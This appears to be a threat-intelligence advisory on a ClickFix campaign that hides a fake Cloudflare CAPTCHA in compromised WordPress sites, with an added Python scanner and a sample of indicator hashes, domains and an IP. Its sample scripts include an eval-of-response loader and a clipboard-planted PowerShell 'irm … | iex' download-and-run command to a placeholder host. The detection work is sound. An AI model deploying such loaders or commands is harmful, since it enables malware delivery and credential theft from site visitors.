ClickFix-as-a-Service platform with a fake Cloudflare CAPTCHA DOM overlay delivered via compromised WordPress sites
TLP: WHITE | Author: dispensight | Created: 2026-05-20 | Modified: 2026-05-20 | 105 IOCs (high volume)
TLP:GREEN | SL-ADV-2026-WP-001 UNIFIED | Activity window: March 20 – May 19, 2026

ClickFix/TDS cluster active since March 2026. Compromised WordPress sites inject an obfuscated JS loader that fires a synchronous XHR to a TDS C2 (ntdnewtds.shop / dnsnewtds.shop / sdntds.shop), fetches a remote payload, and executes it inline. Victims see a fake Cloudflare CAPTCHA (rendered inside a Shadow DOM, localized into 50 languages) that silently writes a PowerShell command to the clipboard.

PowerShell chain: IRM stage1 → IWR stage2 → csc.exe compiles a Rozena DLL → injection into svchost → DonutLoader C2 (158.94.208.104) → browser/Firefox/crypto-wallet credential theft → self-delete. A parallel Python chain (Protected.py) uses direct NT syscalls for EDR bypass.

Per-campaign C2 IPs, segmented DonutLoader payloads (my_ / student_ prefixes), and a 6-domain TDS pool suggest a ClickFix-as-a-Service affiliate platform. 4 JS loader variants documented March–May 2026.

SecureLeaf · Dispensight Security Research · SL-ADV-2026-WP-001 rev. 3.0 · STIX 2.1 bundle: 438 objects · 4 variants · 2 execution chains
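The loader and overlay behaviour summarized above (synchronous XHR to a TDS domain, inline execution of the response, a Shadow DOM overlay, a clipboard write carrying a PowerShell download-and-run one-liner) can be triaged statically from the decoded script text. The following is an added example written for this page, not tooling from the advisory or its authors: it scores script bodies on those traits and matches the TDS domains and C2 IP quoted in the pulse. The trait weights and the "verify you are human" phrasing are assumptions for triage ordering; the three script samples are constructed, not captures from the campaign.

```python
"""Static triage of WordPress page/theme JavaScript for the ClickFix loader and overlay
traits described in SL-ADV-2026-WP-001.  Added example, not the advisory's own tooling."""
import re
from urllib.parse import urlparse

# Network indicators quoted in the advisory text.
TDS_DOMAINS = {"ntdnewtds.shop", "dnsnewtds.shop", "sdntds.shop"}
KNOWN_C2_IPS = {"158.94.208.104"}

# Behavioural traits as (name, weight, regex).  Weights are an assumption chosen
# for triage ordering; they are not values taken from the advisory.
TRAITS = [
    # XMLHttpRequest.open(method, url, false): the synchronous fetch the loader uses
    ("sync_xhr", 3, re.compile(
        r"\.open\s*\(\s*['\"](?:GET|POST)['\"]\s*,\s*[^,]+,\s*false\s*\)", re.I)),
    # response body handed straight to eval / Function / setTimeout: inline execution
    ("inline_exec_of_response", 3, re.compile(
        r"\b(?:eval|new\s+Function|setTimeout)\s*\([^;]*responseText", re.I)),
    # overlay rendered inside a Shadow DOM (invisible to document.querySelector)
    ("shadow_dom", 1, re.compile(r"\.attachShadow\s*\(", re.I)),
    ("clipboard_write", 2, re.compile(
        r"navigator\.clipboard\.writeText|execCommand\s*\(\s*['\"]copy['\"]", re.I)),
    # PowerShell one-liner with a download/execute cmdlet embedded in the script
    ("powershell_oneliner", 3, re.compile(
        r"\b(?:powershell|pwsh)\b.{0,200}?\b(?:irm|iwr|iex|Invoke-RestMethod|"
        r"Invoke-WebRequest|Invoke-Expression)\b", re.I | re.S)),
    # wording typical of the Cloudflare challenge page being imitated (assumption)
    ("fake_cloudflare", 1, re.compile(r"cloudflare|verify you are human|ray id", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def known_indicators(script: str) -> list[str]:
    """Return advisory-listed TDS domains / C2 IPs referenced by URL in the script."""
    hosts = set()
    for url in URL_RE.findall(script):
        host = urlparse(url).hostname
        if host in TDS_DOMAINS or host in KNOWN_C2_IPS:
            hosts.add(host)
    return sorted(hosts)


def scan_script(script: str) -> dict:
    """Score one script body; a known indicator alone is enough to flag it."""
    traits = [name for name, _, rx in TRAITS if rx.search(script)]
    score = sum(w for name, w, _ in TRAITS if name in traits)
    iocs = known_indicators(script)
    score += 5 * len(iocs)
    return {"traits": traits, "iocs": iocs, "score": score,
            "suspicious": bool(iocs) or score >= 6}


# Constructed samples (not real captures).  The real loader is obfuscated, so run
# this over the decoded/deobfuscated script text, not the raw injected blob.
BENIGN_SCRIPT = """
var xhr = new XMLHttpRequest();
xhr.open('GET', '/wp-json/wp/v2/posts', true);
xhr.onload = function () { render(JSON.parse(xhr.responseText)); };
xhr.send();
"""

LOADER_SCRIPT = """
var r = new XMLHttpRequest();
r.open('GET', 'https://ntdnewtds.shop/s.php?u=' + encodeURIComponent(location.href), false);
r.send(null);
eval(r.responseText);
"""

# stage1.example.invalid is a placeholder; the advisory does not name the stage-1 host.
OVERLAY_SCRIPT = """
var host = document.createElement('div');
var shadow = host.attachShadow({mode: 'closed'});
shadow.innerHTML = '<div class="cf-box">Verify you are human</div>';
document.body.appendChild(host);
var cmd = 'powershell -w hidden -c "irm https://stage1.example.invalid/a | iex"';
shadow.querySelector('.cf-box').addEventListener('click', function () {
  navigator.clipboard.writeText(cmd);
});
"""

if __name__ == "__main__":
    for label, body in [("benign", BENIGN_SCRIPT), ("loader", LOADER_SCRIPT),
                        ("overlay", OVERLAY_SCRIPT)]:
        print(label, scan_script(body))
```

Two caveats when applying this. First, the overlay lives in a Shadow DOM; with a closed shadow root its nodes are unreachable from `document.querySelector` and from DOM-walking page scanners, so inspect the served script text (or hook `Element.prototype.attachShadow` in an instrumented browser) rather than the rendered tree. Second, the injected loader is obfuscated per the advisory, so these patterns only fire after decoding; a cheaper first pass on a WordPress host is to diff theme and plugin files against clean copies and feed only the differing scripts to the scanner.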
Indicators of Compromise (11 of 105 total shown)
Indicator types present in the pulse: CIDR, FileHash-MD5, FileHash-SHA1, FileHash-SHA256, IPv4, URL, domain, hostname

TYPE | INDICATOR | DESCRIPTION | CREATED
FileHash-SHA256 | 1d9d37f90fa60b93647a845ff39f64ff7e7f71f6f2a576780fbe974064a907b1 | | 2026-05-20
FileHash-SHA256 | 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810 | SHA256 of 724a8445c5c3fd57778d82f62b9d4a6112a3bb2d | 2026-05-20
FileHash-SHA256 | 2f515997ab1c7f5ab94a46041ad2af06031a842469b65bcbd2c64bd47f12a896 | | 2026-05-20
FileHash-SHA256 | 339e0e018b48a118c36c0b7181b143c255ebad19c5f628a1a57903592f07df94 | | 2026-05-20
FileHash-SHA256 | 4a3b036f9447151b8ca04dbdce96bf98edf8a8a8a5638c4fc1dc3b237eb30be5 | | 2026-05-20
FileHash-SHA256 | 4b77eae349a8cbcea7133cf3640a64ebf1f69d54d8f6469d7be6fdc188ca4ca4 | | 2026-05-20
FileHash-SHA256 | 6d0f2cd8b853c64182986d2dcaefe5df9fe9b53220774f99dcfd9f09add3540d | | 2026-05-20
FileHash-SHA256 | 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 | SHA256 of f1542a7697e04865e1dfeeed084e5ea5870100f0 | 2026-05-20
FileHash-SHA256 | b04f539c7bbb9133d2f801bfce73ec84ad3cc33768685ca415113f622db90168 | | 2026-05-20
FileHash-SHA256 | b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937 | | 2026-05-20
FileHash-SHA256 | ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff | | 2026-05-20